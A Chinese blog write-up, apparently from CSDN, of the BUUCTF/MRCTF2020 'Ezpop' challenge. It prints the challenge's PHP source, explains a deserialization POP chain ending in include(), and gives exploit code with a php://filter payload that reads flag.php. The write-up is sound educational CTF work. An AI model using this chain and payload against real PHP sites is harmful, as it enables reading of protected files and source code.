[MRCTF2020]Ezpop 1

已于 2022-03-31 21:20:45 修改
阅读量1.3k 收藏 2
点赞数 2
分类专栏: BUUCTF 文章标签: php web安全 sql
于 2022-03-28 11:11:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/123784406
版权 
知识点:各种魔术方法,以及构造反序列化pop链子的思路

<?php
//flag is in flag.php
class Modifier {
    protected  $var;
    public function append($value){
        include($value);//漏洞利用点
    }
    public function __invoke(){
        //在类被当作函数调用的时候会,例如:Modifiter()这样的时候会被调用。
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        //在类被当作字符串的时候会被调用
        return $this->str->source;
    }

    public function __wakeup(){//反序列化时调用
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        //当调用类的一个不存在的属性时候,或者一个protected 或 private的属性时候则会自动调用它。
        $function = $this->p;
        return $function();//可以触发Modifier 
    }
}

这类题型我是今天才接触的,,借鉴了不少师傅的,所以有些地方可能会和其他人一样。

分析:

先找可以执行shell的位置,或者文件包含的位置,然后通过这个点一步一步向上推。

例如,这题的洞在include($value);,我们可以通过这个执行伪代码php://filter/read=convert.base64-encode/resource=flag.php,且它在function append中。

那么要怎么执行这个呢?可以通过function __invoke来执行function append

function __invoke又可以通过function __get$function();
来实现。

function __get可以通过function __toString$this->str->source;来实现,使得str=new Test(),source=xxx.

最后function __toString,可以通过function __constructecho 'Welcome to '.$this->source."<br>";来实现

链子

<?php
//flag is in flag.php
class Modifier {
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = new Modifier();
    }
}


$a = new Show("self");//可以在__construct中的echo时触发__toString
$a->str = new Test();//可以触发__get
$c = new Show($a);
echo urlencode(serialize($c));

这边用urlencode的原因是:

图来自:https://blog.csdn.net/weixin_45642610/article/details/115919505
在这里插入图片描述

参考:

https://blog.csdn.net/weixin_45577185/article/details/120753245
https://blog.csdn.net/weixin_45642610/article/details/115919505

succ3
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[MRCTF2020]Ezpop-1|php序列化
「 虚幻私塾」
06-30 382
1、打开题目获取到源代码信息,如下: 2、我们的最终目标是获取flag.php中的flag信息,因此分析源代码信息,查看哪里可以获取到flag.php文件,发现在Modifier类中存在include($value),因此想到可以通过php伪协议来获取flag.php的信息,所以现在我们的目的就成了调用append函数,接着往下观察,发现__invoke函数调用了append函数,因此我们只要执行了__invoke函数一样可以获得flag信息,那该怎么执行__invoke函数呢:因此,此时我们应该使用别的函
[MRCTF2020]Ezpop 1(代码审计)
weixin_45577185的博客
10-13 310
太绕了,wuwuwu~ Welcome to index.php <?php //flag is in flag.php //提示:flag在flag.php文件内,猜测是当前网站根目录下的flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 /
[MRCTF2020]Ezpop 1——pop链的反序列化
m0_62879498的博客
05-11 1743
[MRCTF2020]Ezpop 1 进入环境,得到源码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier {
Buu [MRCTF2020]Ezpop1
Lakers248_的博客
05-08 672
解题思路
BUUCTF闯关日记--[MRCTF2020]Ezpop1
qq_64201116的博客
05-14 606
进入页面,熟悉的代码审计 提示了flag.php <?php class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var); } } class Show{ public $sourc.
BUUCTF-[MRCTF2020]Ezpop
qwsn
11-19 2418
0x01、Web 1.BUUCTF-[MRCTF2020]Ezpop 第一步:开启题目环境 图略 第二步:访问链接,发现一段php代码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%
vigenere-cipher:Vigenere密码
03-19
它由重复26行/列的字母表组成,但是第一个字母被推到字母表的末尾,并且一直持续到z是第25行中的第一个字母为止。然后,程序将密钥用于行,将消息加密用于列。字母匹配,并显示加密的消息。标点和空格保持不变。
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
向前欧拉法matlab代码-zbc-ops:我的GitHub个人资料的配置文件
05-20
1.mrctf[friendly_sign-in] 意思就是服务器产生一个数组$N$,需要输入一个数组$X$与其对应位置乘积和为$0$,题目说$N$中全为素数,实际好像不是,因为产生这么多素数比较耗时间,但里面还是大部分都是素数。这里可以...
pop链反序列化 [MRCTF2020]Ezpop1
最新发布
m0_75178803的博客
11-25 1287
当 PHP 反序列化一个对象时,它首先读取对象的类名,并创建一个新的对象。如果属性个数比实际属性个数多,则 PHP 会忽略这些多余的属性,直接将对象反序列化到一个不完整的状态。这是因为反序列化操作本质上是在将一个字符串转换为可执行的代码,因此如果反序列化的对象包含恶意代码,那么它可能会在反序列化过程中执行。如果我们get方法传入一个pop函数,并且用isset函数检查变量是否被设置,是不是值为null,如果存在且不为null,则反序列化我们传入的pop参数。这个语法意味着,如果构造函数没有收到参数,
[MRCTF2020]Ezpop(详解)
pakho_C的博客
07-29 2293
将pop对象的参数source作为Show类的对象(此时source对象也有两个参数source和str),则会执行__toString()函数,returnsource对象的str参数的source,此时str如果是Test类的一个对象,则没有source参数,执行__toString()函数则会找不到source参数,就会调用Test类对象str的__get()函数。所以可以将参数p设置为Modifier类的对象,从而执行__invoke()函数,进而执行append函数。...
web buuctf [MRCTF2020]Ezpop1
weixin_44214568的博客
04-07 554
知识点:1.魔法函数 2.文件包含漏洞 1.开题,php代码审计 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Cr...
BUUCTF [MRCTF2020]Ezpop 1
weixin_45642610的博客
04-21 1282
BUUCTF [MRCTF2020]Ezpop 1 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { pr
POP链入门
cxiaodi的博客
06-11 179
【代码】POP链入门。
[MRCTF2020]Ezpop—序列化pop链
weixin_43952190的博客
05-09 6593
Ezpop 序列化Pop链 利用几个类之间相互关联进行构造 文件包含漏洞 Modifier类中append函数使用了include(),会出现文件包含漏洞。 以下是题目内容: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%
MRCTF2020 web Ezpop_Revenge 简单记录
a3320315的博客
03-31 2996
题目介绍 首先这是一个typecho的框架 然后通过扫目录得到www.zip源码泄露,然后就是审计代码了~~ 解题过程 首先我们找到输入点 在插件中,我们发现action()的代码 这儿需要说明一下,这儿的action一般是自动加载的,当路由加载类是会自动加载某个函数,所以我们直接搜索这个类得名称~~ Helper::addRoute("page_admin_action","/page_a...
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. Please submit the flags to get your points! 解题思路: 这道题目是一个较为简单的misc题目,我们需要在给定的文本中找到flag,每个flag对应一个问题。比如说,第一个flag对应的问题是: What is the capital of China? 在文本中找到答案"Beijing"即可得到对应的flag。 其他的问题和答案大概率也可以在文本中找到,需要稍微仔细一些,比如有一些问题是需要计算的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值